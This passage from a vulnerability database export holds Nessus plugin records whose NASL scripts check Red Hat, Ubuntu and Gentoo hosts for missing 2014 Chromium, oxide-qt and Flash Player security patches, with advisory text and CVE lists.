preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1894\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-39.0.2171.65-2.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:28:01", "description": "A buffer overflow was discovered in Skia. 
If a user were tricked into\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were\ntricked into opening a specially crafted website, an attacker could\npotentially exploit these to cause a denial of service via renderer\ncrash or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2014-7907)\n\nAn integer overflow was discovered in media. If a user were tricked\ninto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were\ntricked into opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked into opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2014-7910).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2014-11-20T00:00:00", "title": "Ubuntu 14.04 LTS / 14.10 : oxide-qt vulnerabilities (USN-2410-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "modified": "2014-11-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2410-1.NASL", "href": "https://www.tenable.com/plugins/nessus/79354", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2410-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79354);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7904\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_bugtraq_id(71161, 71166, 71167, 71168, 71170);\n script_xref(name:\"USN\", value:\"2410-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 : oxide-qt vulnerabilities (USN-2410-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in Skia. 
If a user were tricked in to\nopening a specially crafted website, an attacked could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were\ntricked in to opening a specially crafted website, an attacked could\npotentially exploit these to cause a denial of service via renderer\ncrash or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2014-7907)\n\nAn integer overflow was discovered in media. If a user were tricked in\nto opening a specially crafted website, an attacked could potentially\nexploit this to cause a denial of service via renderer crash or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2014-7910).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2410-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected liboxideqtcore0, oxideqt-codecs and / or\noxideqt-codecs-extra packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.3.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs\", pkgver:\"1.3.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.3.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.3.4-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs\", pkgver:\"1.3.4-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"oxideqt-codecs-extra\", pkgver:\"1.3.4-0ubuntu0.14.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0 / oxideqt-codecs / oxideqt-codecs-extra\");\n}\n", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:56:36", "description": "The remote host is affected by the vulnerability described in GLSA-201412-13\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 20, "published": "2014-12-15T00:00:00", "title": "GLSA-201412-13 : Chromium: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3200", "CVE-2014-7899", "CVE-2014-3192", "CVE-2014-3193", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-3194", "CVE-2014-3198", "CVE-2014-7901", "CVE-2014-3199", "CVE-2014-7903", "CVE-2014-3189", "CVE-2014-3191", "CVE-2014-7910", "CVE-2014-3195", "CVE-2014-3197", "CVE-2014-3190", "CVE-2014-3188", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2014-12-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chromium"], "id": "GENTOO_GLSA-201412-13.NASL", "href": "https://www.tenable.com/plugins/nessus/79966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-13.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79966);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-3188\", \"CVE-2014-3189\", \"CVE-2014-3190\", \"CVE-2014-3191\", \"CVE-2014-3192\", \"CVE-2014-3193\", \"CVE-2014-3194\", \"CVE-2014-3195\", \"CVE-2014-3197\", \"CVE-2014-3198\", \"CVE-2014-3199\", \"CVE-2014-3200\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_bugtraq_id(70262, 70273, 71158, 71159, 71160, 71161, 71163, 71164, 71165, 71166, 71168, 71170);\n script_xref(name:\"GLSA\", value:\"201412-13\");\n\n script_name(english:\"GLSA-201412-13 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-13\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-39.0.2171.65'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 39.0.2171.65\"), vulnerable:make_list(\"lt 39.0.2171.65\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:15:08", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-24, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. 
(CVE-2014-0573, CVE-2014-0574,\nCVE-2014-0576, CVE-2014-0577, CVE-2014-0581, CVE-2014-0582,\nCVE-2014-0584, CVE-2014-0585, CVE-2014-0586, CVE-2014-0588,\nCVE-2014-0589, CVE-2014-0590, CVE-2014-8438, CVE-2014-8440,\nCVE-2014-8441)\n\nThis update also fixes an information disclosure flaw in flash-plugin\nthat could allow a remote attacker to obtain a victim's session\ncookie. (CVE-2014-8437)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.418.", "edition": 25, "published": "2014-11-13T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:1852)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2014-11-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1852.NASL", "href": "https://www.tenable.com/plugins/nessus/79228", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1852. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79228);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\");\n script_bugtraq_id(71033, 71036, 71037, 71038, 71039, 71041, 71042, 71043, 71044, 71045, 71046, 71047, 71048, 71049, 71050, 71051);\n script_xref(name:\"RHSA\", value:\"2014:1852\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:1852)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-24, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. 
An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0573, CVE-2014-0574,\nCVE-2014-0576, CVE-2014-0577, CVE-2014-0581, CVE-2014-0582,\nCVE-2014-0584, CVE-2014-0585, CVE-2014-0586, CVE-2014-0588,\nCVE-2014-0589, CVE-2014-0590, CVE-2014-8438, CVE-2014-8440,\nCVE-2014-8441)\n\nThis update also fixes an information disclosure flaw in flash-plugin\nthat could allow a remote attacker to obtain a victim's session\ncookie. (CVE-2014-8437)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.418.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-24.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8441\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0590\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8438\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0576\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0577\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0584\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0581\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0589\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0582\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1852\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.418-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.418-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:02", "description": "flash-player was updated to version 11.2.202.418 to fix 18 security\nissues.\n\nThese security issues were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2014-0576, CVE-2014-0581,\n CVE-2014-8440, CVE-2014-8441).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\n - A double free vulnerability that could lead to code\n execution (CVE-2014-0574).\n\n - Type confusion vulnerabilities that could lead to code\n execution (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585,\n CVE-2014-0586, CVE-2014-0590).\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution (CVE-2014-0582, CVE-2014-0589).\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens (CVE-2014-8437).\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level (CVE-2014-0583). 
